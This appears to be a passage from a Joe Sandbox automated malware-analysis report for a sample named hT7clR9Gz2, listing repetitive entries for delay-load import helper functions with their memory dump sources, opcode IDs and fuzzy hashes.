                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                      • String ID: }
                                                                      • API String ID: 1269201914-3008617099
                                                                      • Opcode ID: 2501dda44feb99bc3532b79eb76a435d25e5dc95795eef7eb405f9c7af8f0e9a
                                                                      • Instruction ID: ac2900d0dc9259db9e6e2c703cefa285c63a0db45ba1c849b151728bdb6b5b28
                                                                      • Opcode Fuzzy Hash: 2501dda44feb99bc3532b79eb76a435d25e5dc95795eef7eb405f9c7af8f0e9a
                                                                      • Instruction Fuzzy Hash: 02B012E1359188FC314672452D06C37012DC0C0B20330413FF905C9380D84CAC981432
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 007DE246 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 007DE1E3
                                                                        • Part of subcall function 007DE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007DE8D0
                                                                        • Part of subcall function 007DE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007DE8E1
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                      • String ID: }
                                                                      • API String ID: 1269201914-3008617099
                                                                      • Opcode ID: 3a3b38d622c8ab282a0dbe23e290ed83c25cde0b7a98e345693ee25dde619799
                                                                      • Instruction ID: 4b7aecb9becad591a8a7866285c6a27360db70f416fbd4d99a377bfd0ce93270
                                                                      • Opcode Fuzzy Hash: 3a3b38d622c8ab282a0dbe23e290ed83c25cde0b7a98e345693ee25dde619799
                                                                      • Instruction Fuzzy Hash: 2CB012D1359088EC310671452D06C37012DC0C1B20330803FFD05C9380D84CEC941432
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 007DE23C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 007DE1E3
                                                                        • Part of subcall function 007DE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007DE8D0
                                                                        • Part of subcall function 007DE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007DE8E1
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                      • String ID: }
                                                                      • API String ID: 1269201914-3008617099
                                                                      • Opcode ID: 1d57d0349128972e2b716d4507267a3b17c8e83eb05c9a9186edeb21d19ef983
                                                                      • Instruction ID: a66ca527eccf405f083efe4e3e9b0a7c9af41a09e1211079cd7f7eff4e2bd4fc
                                                                      • Opcode Fuzzy Hash: 1d57d0349128972e2b716d4507267a3b17c8e83eb05c9a9186edeb21d19ef983
                                                                      • Instruction Fuzzy Hash: D1B012E1358048EC310671462D06C37012CD0C0F20330403FFA05C9380D84C6D541432
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 007DE232 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 007DE1E3
                                                                        • Part of subcall function 007DE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007DE8D0
                                                                        • Part of subcall function 007DE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007DE8E1
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                      • String ID: }
                                                                      • API String ID: 1269201914-3008617099
                                                                      • Opcode ID: 703a5cc5160e1e17bb973a144865143d5cfc83673ac784a9bf5288b66e4d5dce
                                                                      • Instruction ID: e6af73640453a4bf8317827f106564cdf335bf9d004c0902d6e625d89a014bbe
                                                                      • Opcode Fuzzy Hash: 703a5cc5160e1e17bb973a144865143d5cfc83673ac784a9bf5288b66e4d5dce
                                                                      • Instruction Fuzzy Hash: 7AB012E1358048EC310671452E07C37012CC0C0F20330403FFA05C9380DC4D6E551432
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 007DE228 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 007DE1E3
                                                                        • Part of subcall function 007DE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007DE8D0
                                                                        • Part of subcall function 007DE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007DE8E1
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                      • String ID: }
                                                                      • API String ID: 1269201914-3008617099
                                                                      • Opcode ID: 6b7534173fcf790917ce9578da346048e871fa1874b0a0db7e3634f70cfa7646
                                                                      • Instruction ID: f61112b7a47a267cf29a0efa3c9e155ed85570be4b9e45597c31fbb43fdaf7dc
                                                                      • Opcode Fuzzy Hash: 6b7534173fcf790917ce9578da346048e871fa1874b0a0db7e3634f70cfa7646
                                                                      • Instruction Fuzzy Hash: 4CB012E1358188FC314671452D06C37012CC0C0F20330413FFA05C9380D84D6D941432
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 007DE21E Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 007DE1E3
                                                                        • Part of subcall function 007DE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007DE8D0
                                                                        • Part of subcall function 007DE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007DE8E1
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                      • String ID: }
                                                                      • API String ID: 1269201914-3008617099
                                                                      • Opcode ID: cfb351957f71b50e384c5dd447df38570488d2d45f7a0b9449c1985c7be8e31d
                                                                      • Instruction ID: b2d0fb81134347e11c12415a89a651cda173141ed0b77febe408664a9568b3b1
                                                                      • Opcode Fuzzy Hash: cfb351957f71b50e384c5dd447df38570488d2d45f7a0b9449c1985c7be8e31d
                                                                      • Instruction Fuzzy Hash: 6DB012E1358048FC310671452D06C37012CC0C1F20330803FFE05C9380D84CAD541432
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 007DE20A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 007DE1E3
                                                                        • Part of subcall function 007DE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007DE8D0
                                                                        • Part of subcall function 007DE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007DE8E1
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                      • String ID: }
                                                                      • API String ID: 1269201914-3008617099
                                                                      • Opcode ID: 8f0fe09d87f4bded467616071bb996668030d4c9ae1a613be1f6608dbf938945
                                                                      • Instruction ID: ed43b448a9454863b078bfbb6796053cd1a18fabc47786e725dcd60f626d47c4
                                                                      • Opcode Fuzzy Hash: 8f0fe09d87f4bded467616071bb996668030d4c9ae1a613be1f6608dbf938945
                                                                      • Instruction Fuzzy Hash: 16B012D1358048ED310672452E07C37012CC0C0B20330803FF905C9380DC5D6D5D1432
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 007DE200 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 007DE1E3
                                                                        • Part of subcall function 007DE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007DE8D0
                                                                        • Part of subcall function 007DE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007DE8E1
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                      • String ID: }
                                                                      • API String ID: 1269201914-3008617099
                                                                      • Opcode ID: 294ef678124127465723d56f460c9e0bdf6e574a13d002016afce52e10a959d7
                                                                      • Instruction ID: bcaf61e0f3ea071593199e19c48abf72a437e26d77e8949f29da1ff220fb9ee4
                                                                      • Opcode Fuzzy Hash: 294ef678124127465723d56f460c9e0bdf6e574a13d002016afce52e10a959d7
                                                                      • Instruction Fuzzy Hash: B2B012D1358188FD314672452D06C37012CC0C0B20330813FF905C9380D84C6C981432
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 007DEAE7 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 007DEAF9
                                                                        • Part of subcall function 007DE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007DE8D0
                                                                        • Part of subcall function 007DE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007DE8E1
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                      • String ID: 3So
                                                                      • API String ID: 1269201914-1105799393
                                                                      • Opcode ID: e765bf6a1f0b71c1b437535dea3b5468f0e87c54eb98bba8d6e2d6888463f5c4
                                                                      • Instruction ID: 13ce81ffa21cbe79553e1d5937e03a97159b7a796311b829c6880070dae07f5e
                                                                      • Opcode Fuzzy Hash: e765bf6a1f0b71c1b437535dea3b5468f0e87c54eb98bba8d6e2d6888463f5c4
                                                                      • Instruction Fuzzy Hash: C5B012C639E497BC3106B2412E06C37013CD0C0B91330D02FF600CC281DC8C0C451431
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 007DE2B4 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 007DE1E3
                                                                        • Part of subcall function 007DE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007DE8D0
                                                                        • Part of subcall function 007DE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007DE8E1
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                      • String ID: }
                                                                      • API String ID: 1269201914-3008617099
                                                                      • Opcode ID: 4658147bdc5583403792a0f8aef6b6e77f3052fec5617409eaaea822e139a614
                                                                      • Instruction ID: db181273a320cec1d85926d26a09009520a957bc55e00e2189e31fb4028dfebe
                                                                      • Opcode Fuzzy Hash: 4658147bdc5583403792a0f8aef6b6e77f3052fec5617409eaaea822e139a614
                                                                      • Instruction Fuzzy Hash: 4CB012D1358048EC310771452D07C37012CD0C0B20330443FF905C93C0D84C6C541432
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 007DE282 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 007DE1E3
                                                                        • Part of subcall function 007DE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007DE8D0
                                                                        • Part of subcall function 007DE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007DE8E1
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                      • String ID: }
                                                                      • API String ID: 1269201914-3008617099
                                                                      • Opcode ID: 5b941bc90314b2a61621ed730091fb1a1d954cf7e5de278bd48c4f435fe264a8
                                                                      • Instruction ID: dd83c944e8fb1e72da99e6214090d2e5c43b82e22c8d162b6cd9573b75455c57
                                                                      • Opcode Fuzzy Hash: 5b941bc90314b2a61621ed730091fb1a1d954cf7e5de278bd48c4f435fe264a8
                                                                      • Instruction Fuzzy Hash: E8B012E1358058EC310671452E07C3701ACC0C0B20330403FF905C9380EC4D6D551432
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 007DE546 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 007DE51F
                                                                        • Part of subcall function 007DE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007DE8D0
                                                                        • Part of subcall function 007DE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007DE8E1
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                      • String ID: PDGu<}
                                                                      • API String ID: 1269201914-3101634298
                                                                      • Opcode ID: 4866624b75757d34b4de1c277cd4cafd97faa383ce3127caf2800d5c07deccde
                                                                      • Instruction ID: 91137e397e0fd1dcd85096fbdd3fd0ade910cdf644b67e711bdfaa22fa79082a
                                                                      • Opcode Fuzzy Hash: 4866624b75757d34b4de1c277cd4cafd97faa383ce3127caf2800d5c07deccde
                                                                      • Instruction Fuzzy Hash: 11B092C1258545BC220661486D06C3A1128C091B10320522BB505C8280A8480C882435
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 007DE50D Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 007DE51F
                                                                        • Part of subcall function 007DE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007DE8D0
                                                                        • Part of subcall function 007DE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007DE8E1
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                      • String ID: PDGu<}
                                                                      • API String ID: 1269201914-3101634298
                                                                      • Opcode ID: 71951d855210229bf753b3cc29007d2b40c93d35b01074cdd4440645bc45e937
                                                                      • Instruction ID: 3d69170f9c029e672bbc6fb24b0bbc4df0ec2509082008f4a6292f8b6dab9f8b
                                                                      • Opcode Fuzzy Hash: 71951d855210229bf753b3cc29007d2b40c93d35b01074cdd4440645bc45e937
                                                                      • Instruction Fuzzy Hash: F3B012C125C445FC310631643D0AC3F113CD0C1F10330503FF511CC681A84C0D482431
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 007DE27D Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 007DE1E3
                                                                        • Part of subcall function 007DE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007DE8D0
                                                                        • Part of subcall function 007DE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007DE8E1
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                      • String ID: }
                                                                      • API String ID: 1269201914-3008617099
                                                                      • Opcode ID: 5e7036409b8896e204903d6407ec116e6178d284a757dbec04e8a8b5ff09866b
                                                                      • Instruction ID: db87a27f010d87303fc61bb121ae584a67bb874314acc892cd6514eafdc94ec6
                                                                      • Opcode Fuzzy Hash: 5e7036409b8896e204903d6407ec116e6178d284a757dbec04e8a8b5ff09866b
                                                                      • Instruction Fuzzy Hash: 93A001E62A918AFC310A72526E0AC3B022DC4C5B65334992FF916C9681A89968552872
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 007DE25F Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 007DE1E3
                                                                        • Part of subcall function 007DE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007DE8D0
                                                                        • Part of subcall function 007DE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007DE8E1
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmpDownload File
